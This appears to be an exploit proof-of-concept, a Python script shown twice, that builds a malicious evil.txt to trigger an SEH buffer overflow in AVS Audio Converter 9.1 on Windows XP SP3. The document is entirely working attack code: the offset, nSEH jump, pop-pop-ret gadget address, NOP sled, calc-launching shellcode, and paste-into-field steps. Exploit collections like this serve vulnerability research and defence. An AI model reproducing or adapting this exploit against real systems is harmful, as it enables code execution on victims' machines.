A working exploit PoC for AVS Audio Converter 9.1 (SEH Buffer Overflow)

## avs_exploit.py
#!/usr/bin/python

#----------------------------------------------------------------------------------#
# Exploit: AVS Audio Converter 9.1                                                 #
# OS: WinXP SP3                                                                    #
# Author: Hexabin(@TheRealHexabin - Twitter)                                       #
# Software: https://www.avs4you.com/avs-audio-converter.aspx                       #
#                                                                                  #
# Original Author: ZwX                                                             #
# Link to Original Exploit: https://www.exploit-db.com/exploits/47788              #
#----------------------------------------------------------------------------------#

#----------------------------------------------------------------------------------#
# Badchars: \x00\x0A\x0D                                                           #
#----------------------------------------------------------------------------------#

#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
# 0x74c9ea1e : pop ebx # pop edi # ret 0x10 |  {PAGE_EXECUTE_READ} [oleacc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.2.5406.0 (C:\WINDOWS\system32\oleacc.dll)    #
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#

#Proof of Concept (PoC):
#=======================
# 1. Download and install AVS Audio Converter
# 2. Open the AVS Audio Converter
# 3. Run the python script to create the file evil.txt
# 4. Copy and paste the characters found in the file (evil.txt) in the field "Output Folder"
# 5. Click on browse
# 6. pWnEd!

filename = "evil.txt"
shellcode = (        # Windows XP SP3 Calc.exe http://shell-storm.org/shellcode/files/shellcode-739.php
    "\x31\xC9"
    "\x51"
    "\x68\x63\x61\x6C\x63"
    "\x54"
    "\xB8\xC7\x93\xC2\x77"
    "\xFF\xD0"
)

nseh = "\xEB\x06\x90\x90"
seh = "\x1E\xEA\xC9\x74"
nopsled = "\x90"*20
junk = (1212 - len(shellcode))*"D"

buffer = "A"*260 + nseh + seh + nopsled + shellcode + junk

textFile = open(filename, "w")
textFile.write(buffer)
textFile.close()
	#!/usr/bin/python

	#----------------------------------------------------------------------------------#
	# Exploit: AVS Audio Converter 9.1 #
	# OS: WinXP SP3 #
	# Author: Hexabin(@TheRealHexabin - Twitter) #
	# Software: https://www.avs4you.com/avs-audio-converter.aspx #
	# #
	# Original Author: ZwX #
	# Link to Original Exploit: https://www.exploit-db.com/exploits/47788 #
	#----------------------------------------------------------------------------------#

	#----------------------------------------------------------------------------------#
	# Badchars: \x00\x0A\x0D #
	#----------------------------------------------------------------------------------#

	#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
	# 0x74c9ea1e : pop ebx # pop edi # ret 0x10 \| {PAGE_EXECUTE_READ} [oleacc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.2.5406.0 (C:\WINDOWS\system32\oleacc.dll) #
	#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#

	#Proof of Concept (PoC):
	#=======================
	# 1. Download and install AVS Audio Converter
	# 2. Open the AVS Audio Converter
	# 3. Run the python script to create the file evil.txt
	# 4. Copy and paste the characters found in the file (evil.txt) in the field "Output Folder"
	# 5. Click on browse
	# 6. pWnEd!

	filename = "evil.txt"
	shellcode = ( # Windows XP SP3 Calc.exe http://shell-storm.org/shellcode/files/shellcode-739.php
	"\x31\xC9"
	"\x51"
	"\x68\x63\x61\x6C\x63"
	"\x54"
	"\xB8\xC7\x93\xC2\x77"
	"\xFF\xD0"
	)

	nseh = "\xEB\x06\x90\x90"
	seh = "\x1E\xEA\xC9\x74"
	nopsled = "\x90"*20
	junk = (1212 - len(shellcode))*"D"

	buffer = "A"*260 + nseh + seh + nopsled + shellcode + junk

	textFile = open(filename, "w")
	textFile.write(buffer)
	textFile.close()